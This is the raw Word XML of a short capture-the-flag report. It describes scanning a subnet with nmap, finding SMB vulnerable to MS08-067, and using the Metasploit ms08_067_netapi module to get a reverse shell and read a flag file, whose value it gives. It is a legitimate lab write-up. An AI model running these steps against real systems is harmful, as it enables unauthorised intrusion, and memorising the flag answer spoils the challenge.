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61893" w14:textId="7FA3BD5A" w:rsidR="000F7F0D" w:rsidRDefault="000F7F0D" w:rsidP="000F7F0D">
      <w:pPr>
        <w:ind w:left="720" w:hanging="7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CTF </w:t>
      </w:r>
      <w:r w:rsidR="005D55FF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-Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8D84F" w14:textId="3352E919" w:rsidR="000F7F0D" w:rsidRDefault="000F7F0D" w:rsidP="000F7F0D">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546A87B8" w14:textId="234956EA" w:rsidR="008B031B" w:rsidRDefault="00864153" w:rsidP="008B03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At </w:t>
      </w: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I scanned the network using the network address and </w:t>
      </w:r>
      <w:r w:rsidR="00EB0EAF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scanning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> all the hosts in it</w:t>
      </w:r>
      <w:r w:rsidR="008B031B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, I found the IP address of the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F981C42" w14:textId="440B0A8A" w:rsidR="008B031B" w:rsidRDefault="008B031B" w:rsidP="008B03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gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the network address is 192.168.1.1 then run the commnd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0228D" w14:textId="6D0BD9CD" w:rsidR="008B031B" w:rsidRDefault="008B031B" w:rsidP="008B031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B031B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
      <w:r w:rsidR="00985505">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF8E59" w14:textId="1B5106E7" w:rsidR="00985505" w:rsidRDefault="00985505" w:rsidP="00985505">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8286D1" w14:textId="3562F686" w:rsidR="00985505" w:rsidRDefault="00985505" w:rsidP="00985505">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After that I ran an intensive scan on the victim’s IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B879A" w14:textId="77777777" w:rsidR="0083389C" w:rsidRPr="0083389C" w:rsidRDefault="0083389C" w:rsidP="0083389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83389C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap -sC -T4 --script vuln &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57700935" w14:textId="6BEE63C9" w:rsidR="0085570A" w:rsidRPr="0083389C" w:rsidRDefault="0083389C" w:rsidP="0083389C">
      <w:pPr>
        <w:ind w:left="72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194899" wp14:editId="4B328392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6315" w14:textId="0225DBE1" w:rsidR="000E4743" w:rsidRDefault="0085570A" w:rsidP="0085570A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running the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found </w:t>
      </w:r>
      <w:r w:rsidR="0083389C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports open.</w:t>
      </w:r>
      <w:r w:rsidR="0083389C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0083389C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0083389C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> I found that which port is vulnerable to what exploit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEE6D2" w14:textId="71DC773A" w:rsidR="009A36AB" w:rsidRDefault="0083389C" w:rsidP="00401CE6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As we can see that the smb is vulnerable to exploit known as “smb-vuln-ms08-067”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D6D412" w14:textId="199294E0" w:rsidR="0083389C" w:rsidRDefault="0083389C" w:rsidP="00401CE6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27662327" w14:textId="0B20EF62" w:rsidR="0083389C" w:rsidRDefault="0083389C" w:rsidP="00401CE6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opened the msfconsole for the further exploitation of that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098C3ED9" w14:textId="713B7086" w:rsidR="001074A8" w:rsidRPr="001074A8" w:rsidRDefault="001074A8" w:rsidP="001074A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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E940E5" w14:textId="1058CA6E" w:rsidR="0083389C" w:rsidRDefault="001074A8" w:rsidP="00401CE6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709826E" wp14:editId="4DC9C899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9A47" w14:textId="63DD7819" w:rsidR="001074A8" w:rsidRDefault="001074A8" w:rsidP="00401CE6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42553CE9" w14:textId="6561218D" w:rsidR="001074A8" w:rsidRDefault="001074A8" w:rsidP="00401CE6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opening the msfconsole I searched for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A591232" w14:textId="172511D1" w:rsidR="001074A8" w:rsidRDefault="00841F89" w:rsidP="001074A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841F89">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>search ms 08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F79B7" w14:textId="6AF7FDAE" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89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I can see my search matched one exploit. I will use this exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBED0E" w14:textId="038FBECA" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89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97830FF" wp14:editId="7DB62CE4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39F8" w14:textId="7F917281" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F8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841F89">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms08_067_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00841F89">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netapi  2008</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00841F89">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-10-28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2AE6F" w14:textId="74A73584" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89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exploit will help us get the reverse shell from our victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A692D81" w14:textId="35F36105" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89">
      <w:pPr>
        <w:ind w:left="720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First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we have to setup some things, For that we will see the available options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DDDC46" w14:textId="38B22C9C" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F8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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266627C0" w14:textId="3193F264" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89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need to set the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>rhost ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the IP of the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6AE1D" w14:textId="16FCC18A" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F8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set rhost &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79998A25" w14:textId="597BA897" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F8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run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF834A" w14:textId="04C127F1" w:rsidR="00841F89" w:rsidRDefault="00207FBD" w:rsidP="00841F89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we will get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01260CF7" w14:textId="61D2414E" w:rsidR="00207FBD" w:rsidRPr="00841F89" w:rsidRDefault="00207FBD" w:rsidP="00841F89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0D53EEA" wp14:editId="2EE3521F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B7CC" w14:textId="5A204991" w:rsidR="00841F89" w:rsidRDefault="00841F89" w:rsidP="00841F89">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B31FA9" w14:textId="59FF3A30" w:rsidR="00207FBD" w:rsidRDefault="00207FBD" w:rsidP="00841F89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on the C:\ we can see that there is the flag2.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68340E" w14:textId="796E3437" w:rsidR="00207FBD" w:rsidRPr="00841F89" w:rsidRDefault="00461AA9" w:rsidP="00841F89">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461AA9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"batman"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00207FBD" w:rsidRPr="00841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C2959"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B3C6EB6"/>
    <w:lvl w:ilvl="0" w:tplc="4BCEAC7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D64455D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75D613C4"/>
    <w:lvl w:ilvl="0" w:tplc="6218C53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30534020">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="588394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815"/>
    <w:rsid w:val="00076BC2"/>
    <w:rsid w:val="000C6979"/>
    <w:rsid w:val="000E4743"/>
    <w:rsid w:val="000F7F0D"/>
    <w:rsid w:val="001074A8"/>
    <w:rsid w:val="001949F3"/>
    <w:rsid w:val="00207FBD"/>
    <w:rsid w:val="002354DF"/>
    <w:rsid w:val="00267124"/>
    <w:rsid w:val="002C65D3"/>
    <w:rsid w:val="002D2B1D"/>
    <w:rsid w:val="00401CE6"/>
    <w:rsid w:val="0045497B"/>
    <w:rsid w:val="00461AA9"/>
    <w:rsid w:val="005D55FF"/>
    <w:rsid w:val="005E5E6D"/>
    <w:rsid w:val="005F4815"/>
    <w:rsid w:val="0083389C"/>
    <w:rsid w:val="00841F89"/>
    <w:rsid w:val="0085570A"/>
    <w:rsid w:val="00864153"/>
    <w:rsid w:val="008B031B"/>
    <w:rsid w:val="00985505"/>
    <w:rsid w:val="009A36AB"/>
    <w:rsid w:val="00A64757"/>
    <w:rsid w:val="00B569ED"/>
    <w:rsid w:val="00B72B31"/>
    <w:rsid w:val="00BB3260"/>
    <w:rsid w:val="00C508AE"/>
    <w:rsid w:val="00DB31A5"/>
    <w:rsid w:val="00EB0EAF"/>
    <w:rsid w:val="00EC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C35E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DCE7503B-8F4D-4E50-8F8C-9A29D788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31B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B569ED"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B569ED"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008557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57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8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asim</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ammar asim</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <cp:lastPrinted>2022-07-13T19:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-08T10:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-13T20:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>